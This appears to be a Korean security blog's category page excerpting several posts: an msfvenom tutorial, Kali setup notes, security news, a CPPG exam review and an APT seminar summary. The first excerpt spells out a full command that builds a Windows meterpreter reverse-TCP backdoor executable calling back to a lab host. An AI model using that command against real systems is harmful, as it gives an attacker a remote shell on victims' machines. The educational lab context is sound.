정보/보안-개인정보보호 썸네일형 리스트형 [메타익스플로잇] 간단한 악성코드 생성 (msfvenom) * msfvenom : 메타익스플로잇 프레임워크의 악성코드 생성 명령어 * msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.142.138 lport=4444 -f exe -o /root/Desktop/backdoor.exe - -p 옵션 : payload, 보안에서 payload는 악성코드의 일부분. (공격코드) - windows/meterpreter/reverse_tcp : 이미 만들어놓은 payload . 윈도우(운영체제) - 메타익스플로잇 인터프리터(페이로드 종류) - 역으로 tcp 접속(커넥션 방식) - lhost 및 lport :서버 아이피 및 포트로 -p 옵션의 옵션 - -f 옵션 : 파일포맷 - -o 옵션 : 아웃풋 경로 root@kal.. 더보기 칼리/우분투 리눅스 기본 환경 설정 (VMWare 환경) apt install open-vm-tools-desktop // 자동으로 VMWare 화면 크기에 따라 해상도가 맞춰짐, 클립보드 호환 apt install fonts-nanum im-config nabi // 한글폰트, 한글키보드 설정, 한글입력기 등 설치 im-config// 한글키보드 설정 -> 한글설정 후 확인 apt-get update// 설치된 프로그램을 업데이트 or 방금 설치한 프로그램들을 시스템에서 인지하도록 등록 ※ 한영전환은 shift+space * 제어판 -> devices -> keyboard -> 하단 + 클릭 -> shortcut 설정 가능 1) terminal -> command : gnome-terminal -> ctrl+alt+c (예시) 2) web -> firefox.. 더보기 [펌] 보안윤리, SW교육 의무화가 풀어가야 할 숙제 SW교육 못지않게 보안윤리교육도 중요 제대로 준비되지 않은 SW교육은 오히려 독 [보안뉴스 민세아] SW교육 의무화 방침이 확정되면서 관련 업계와 학계의 관심이 뜨겁다. 이미 일부 기업에서는 초·중학생을 대상으로 한 SW교육을 선보이고 있다. 이와 관련 고려대학교 인촌기념관에서는 ‘초·중등 SW교육 현장지원 발대식’이 개최됐다. 발대식에서는 일본 문부과학성 평생학습정책국 정보교육과장인 토모토 노부 씨가 일본의 정보교육현황에 대해 발표하고, 영국 코드카데미(Codecademy) 책임자인 레이첼 스위든뱅크(Rachel Swidenbank) 씨가 코드아카데미와 영국의 SW교육에 대해 발표했다. 영국의 코드카데미 책임자인 레이첼은 “영국은 G20 국가 중 제일 먼저 초중등학교에서 SW교육을 의무화한 나라다. 처.. 더보기 보안담당자 애로사항 1순위 “인력 없어 죽겠어요” 보안담당자 애로사항 1순위 “인력 없어 죽겠어요” 입력날짜 : 2014-07-21 10:30 보안전문인력 부족으로 보안인력 업무 부담 증가, 애로사항 1위 보안사고 시 책임 부담 증가, CEO 설득을 통한 투자 확대 순 [보안뉴스 김지언] 최근 악성코드 유포 및 개인정보 유출사건이 증가하면서 보안담당자들의 업무가 가중되고 있다. 이와 관련 공공 및 기업의 보안담당자들이 업무수행에 있어 가장 큰 애로사항으로 꼽은 것은 ‘보안전문인력 부족(40.3%)’인 것으로 나타났다. 이는 공공기관과 기업의 개인정보보호 및 보안담당자 911명을 대상으로 조사한 결과로 ‘개인정보보호·보안담당자로서 업무수행중 가장 큰 애로사항은?’이라는 질문에 367명이 ‘보안전문인력 부족’이라고 답했다. 이와 관련 시만텍코리아 윤광택 이.. 더보기 지난 1년간 국민 절반 개인정보 털려 【서울=뉴시스】박대로 기자 = 지난해 10월 개인정보보호법 시행 이후 1년간 전 국민의 절반 이상에 해당하는 인원의 개인정보가 유출된 것으로 드러났다. 민주통합당 진선미 의원실이 17일 행정안전부로부터 제출받은 '개인정보 유출신고 접수현황'을 분석한 결과 개인정보보호법이 시행된 지난해 10월부터 올해 8월까지 7개 회사에서 모두 2659만명의 각종 개인정보가 유출됐다. 2659만명은 국내 총인구(2010년말 기준 4941만명)의 55.4%로 절반을 넘는 수준이다. 유출된 정보의 97%는 전기통신 온라인사업자들이 관리하던 회원정보였다. 게다가 직원 실수로 유출된 1건을 제외하면 모두 해킹으로 인한 유출로 확인됐다. 진 의원실에 따르면 지난해 11월에는 국내 최대 게임업체인 넥슨의 메이플스토리 회원 중 13.. 더보기 2012년 개인정보유출 7계명 (소만사) 더보기 CPPG 시험 후기 및 결과 2011년 12월 18일 일요일 서초고등학교에서 제7회 개인정보관리사 CPPG 시험을 보았다. 어떤 자격증인지, 어떤 시험인지 전혀 모르는 상태로, 충동적으로 시험을 신청해버렸다. 그런데, 이 시험은 기출문제는 커녕 어떤식으로 문제가 나오는지도 알 수 없었다. 공부할 교재 조차도 시험 접수하고, 입금하여 신청이 완료되어야 다운로드가 가능하다. 저작권이 있는 자료라 역시 공개되지는 않는다. 이런 자격증 시험은 처음이라 좀 당황스러웠다. 뒤늦게 신청한지라 시간도 없고, 어떻게 준비해야할 지 막막했는데, 시험 신청이 완료되어, 교재를 다운받아보니 더 막막해졌다. 약 180여 페이지되는 교재가 대부분 개인정보보호법과 관련 법률 등에 관한 얘기였다. 한 페이지만 보아도 눈이 감기는... ㅡ,.ㅡ 시험문제나 교재에.. 더보기 [2011.10.20] 안철수연구소 융합보안전략 세미나 2011년 10월 20일 코엑스 인터컨티넨탈 호텔에서 열린 안철수연구소 융합보안전략 세미나에 참석하다. [내용 요약] I. APT(Advanced Persistent Threat)란 무엇인가 1. APT 정의 다양한 IT 기술과 방식들을 이용해 조직적으로 경제적이거나 정치적인 목적을 위해 다양한 보안 위협들을 생산해 지속적으로 특정 대상에게 가하는 일련의 행위 ① Advanced : IT인프라와 관련된 모든 기술들을 다양하게 사용 ② Persistent : 특정 목적이 달성될 때까지 그 공격대상에게 새로운 기술과 방식으로 지속적으로 공격 ③ Threat : 악성코드, 취약점, 해킹과 사회공학 기법 등으로 IT기술에 의해 생산되는 형태 2. APT 특징 ① 명확한 공격 대상을 가짐 (기존의 악성코드는 불특.. 더보기
